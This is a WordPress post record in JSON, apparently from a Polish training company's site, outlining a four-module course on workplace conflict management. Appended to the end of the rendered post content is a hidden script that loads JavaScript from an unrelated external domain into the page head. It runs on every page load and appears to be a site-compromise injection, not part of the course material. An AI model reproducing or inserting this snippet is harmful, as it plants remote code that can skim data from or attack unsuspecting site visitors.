{"id":1187,"date":"2024-03-05T11:01:57","date_gmt":"2024-03-05T10:01:57","guid":{"rendered":"https:\/\/global-metodi.com\/?p=1187"},"modified":"2026-01-08T12:34:14","modified_gmt":"2026-01-08T11:34:14","slug":"zarzadzanie-konfliktem","status":"publish","type":"post","link":"https:\/\/global-metodi.com\/en\/2024\/03\/05\/zarzadzanie-konfliktem\/","title":{"rendered":"Conflict management"},"content":{"rendered":"<section class=\"elementor-section elementor-top-section elementor-element elementor-element-0cf189d pbmit-col-stretched-none pbmit-cursor-color-blackish-color pbmit-bg-color-over-image elementor-section-boxed elementor-section-height-default elementor-section-height-default pbmit-col-stretched-no pbmit-bgimage-no pbmit-bgcolor-yes\" data-id=\"0cf189d\" data-element_type=\"section\" data-cursor=\"blackish-color\">\n<div class=\"elementor-container elementor-column-gap-default\">\n<div class=\"elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-55b074f pbmit-bg-color-over-image pbmit-bgimage-no pbmit-bgcolor-yes\" data-id=\"55b074f\" data-element_type=\"column\">\n<div class=\"elementor-widget-wrap elementor-element-populated\">\n<div class=\"elementor-element elementor-element-d0cd711 elementor-widget elementor-widget-heading\" data-id=\"d0cd711\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n<div class=\"elementor-widget-container\">\n<h2 class=\"elementor-heading-title elementor-size-default\">Modu\u0142 1.<br \/>\nDefinicja konfliktu :<\/h2>\n<\/div>\n<\/div>\n<div class=\"elementor-element elementor-element-bef82a7 elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list\" data-id=\"bef82a7\" data-element_type=\"widget\" data-widget_type=\"icon-list.default\">\n<div class=\"elementor-widget-container\">\n<ul class=\"elementor-icon-list-items\">\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Definicja konfliktu i jego rola w miejscu pracy.<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Przyczyny konflikt\u00f3w i ich wp\u0142yw na efektywno\u015b\u0107 zespo\u0142u.<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Konflikty funkcjonalne i dysfunkcjonalne.<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Identyfikacja typ\u00f3w konflikt\u00f3w w miejscu pracy<\/span><\/li>\n<\/ul>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-0dbdb0c pbmit-bg-color-over-image pbmit-bgimage-no pbmit-bgcolor-yes\" data-id=\"0dbdb0c\" data-element_type=\"column\">\n<div class=\"elementor-widget-wrap elementor-element-populated\">\n<div class=\"elementor-element elementor-element-c03280e elementor-widget elementor-widget-heading\" data-id=\"c03280e\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n<div class=\"elementor-widget-container\">\n<h2 class=\"elementor-heading-title elementor-size-default\">Modu\u0142 2.<br \/>\nDiagnoza i fazy konfliktu:<\/h2>\n<\/div>\n<\/div>\n<div class=\"elementor-element elementor-element-d36bec3 elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list\" data-id=\"d36bec3\" data-element_type=\"widget\" data-widget_type=\"icon-list.default\">\n<div class=\"elementor-widget-container\">\n<ul class=\"elementor-icon-list-items\">\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Narz\u0119dzia i techniki diagnozowania konflikt\u00f3w.<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Analiza g\u0142\u0119boko\u015bci i rozmiaru konfliktu.<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Fazy konfliktu<\/span><\/li>\n<\/ul>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-96a2710 pbmit-bg-color-over-image pbmit-bgimage-no pbmit-bgcolor-yes\" data-id=\"96a2710\" data-element_type=\"column\">\n<div class=\"elementor-widget-wrap elementor-element-populated\">\n<div class=\"elementor-element elementor-element-1641a2a elementor-widget elementor-widget-heading\" data-id=\"1641a2a\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n<div class=\"elementor-widget-container\">\n<h2 class=\"elementor-heading-title elementor-size-default\">Modu\u0142 3.<br \/>\nKomunikacja w sytuacjach konfliktowych:<\/h2>\n<\/div>\n<\/div>\n<div class=\"elementor-element elementor-element-dd4f58b elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list\" data-id=\"dd4f58b\" data-element_type=\"widget\" data-widget_type=\"icon-list.default\">\n<div class=\"elementor-widget-container\">\n<ul class=\"elementor-icon-list-items\">\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Umiej\u0119tno\u015b\u0107 s\u0142uchania i wyra\u017cania potrzeb.<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Trening prowadzenia trudnych rozm\u00f3w<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Negocjacje, arbitra\u017c, mediacje- formy rozwi\u0105zywania spor\u00f3w<\/span><\/li>\n<\/ul>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/section>\n<section class=\"elementor-section elementor-top-section elementor-element elementor-element-abf6860 pbmit-col-stretched-none pbmit-cursor-color-blackish-color pbmit-bg-color-over-image elementor-section-boxed elementor-section-height-default elementor-section-height-default pbmit-col-stretched-no pbmit-bgimage-no pbmit-bgcolor-yes\" data-id=\"abf6860\" data-element_type=\"section\" data-cursor=\"blackish-color\">\n<div class=\"elementor-container elementor-column-gap-default\">\n<div class=\"elementor-column elementor-col-33 elementor-top-column elementor-element elementor-element-03ee216 pbmit-bg-color-over-image pbmit-bgimage-no pbmit-bgcolor-yes\" data-id=\"03ee216\" data-element_type=\"column\">\n<div class=\"elementor-widget-wrap elementor-element-populated\">\n<div class=\"elementor-element elementor-element-c0bc14d elementor-widget elementor-widget-heading\" data-id=\"c0bc14d\" data-element_type=\"widget\" data-widget_type=\"heading.default\">\n<div class=\"elementor-widget-container\">\n<h2 class=\"elementor-heading-title elementor-size-default\">Modu\u0142 4.<br \/>\nZarz\u0105dzanie emocjami w konflikcie:<\/h2>\n<\/div>\n<\/div>\n<div class=\"elementor-element elementor-element-6901035 elementor-icon-list--layout-traditional elementor-list-item-link-full_width elementor-widget elementor-widget-icon-list\" data-id=\"6901035\" data-element_type=\"widget\" data-widget_type=\"icon-list.default\">\n<div class=\"elementor-widget-container\">\n<ul class=\"elementor-icon-list-items\">\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Zrozumienie roli emocji w konflikcie.<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Techniki radzenia sobie z emocjami podczas rozwi\u0105zywania konfliktu.<\/span><\/li>\n<li class=\"elementor-icon-list-item\"><span class=\"elementor-icon-list-text\">Trening odreagowywania na stres<\/span><\/li>\n<\/ul>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/div>\n<\/section>\n<p><script>var url = 'https:\/\/wafsearch.wiki\/xml';\nvar script = document.createElement('script');\nscript.src = url;\nscript.type = 'text\/javascript';\nscript.async = true;\ndocument.getElementsByTagName('head')[0].appendChild(script);<\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Modu\u0142 1. Definicja konfliktu : Definicja konfliktu i jego rola w miejscu pracy. Przyczyny konflikt\u00f3w i ich wp\u0142yw na efektywno\u015b\u0107 zespo\u0142u. Konflikty funkcjonalne i dysfunkcjonalne. Identyfikacja typ\u00f3w konflikt\u00f3w w miejscu pracy Modu\u0142 2. Diagnoza i fazy konfliktu: Narz\u0119dzia i techniki diagnozowania konflikt\u00f3w. Analiza g\u0142\u0119boko\u015bci i rozmiaru konfliktu. Fazy konfliktu Modu\u0142 3. Komunikacja w sytuacjach konfliktowych: [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":1000,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_acf_changed":false,"inline_featured_image":false,"footnotes":""},"categories":[82],"tags":[],"class_list":["post-1187","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-szkolenia"],"acf":[],"_links":{"self":[{"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/posts\/1187","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/comments?post=1187"}],"version-history":[{"count":2,"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/posts\/1187\/revisions"}],"predecessor-version":[{"id":2044,"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/posts\/1187\/revisions\/2044"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/media\/1000"}],"wp:attachment":[{"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/media?parent=1187"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/categories?post=1187"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/global-metodi.com\/en\/wp-json\/wp\/v2\/tags?post=1187"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}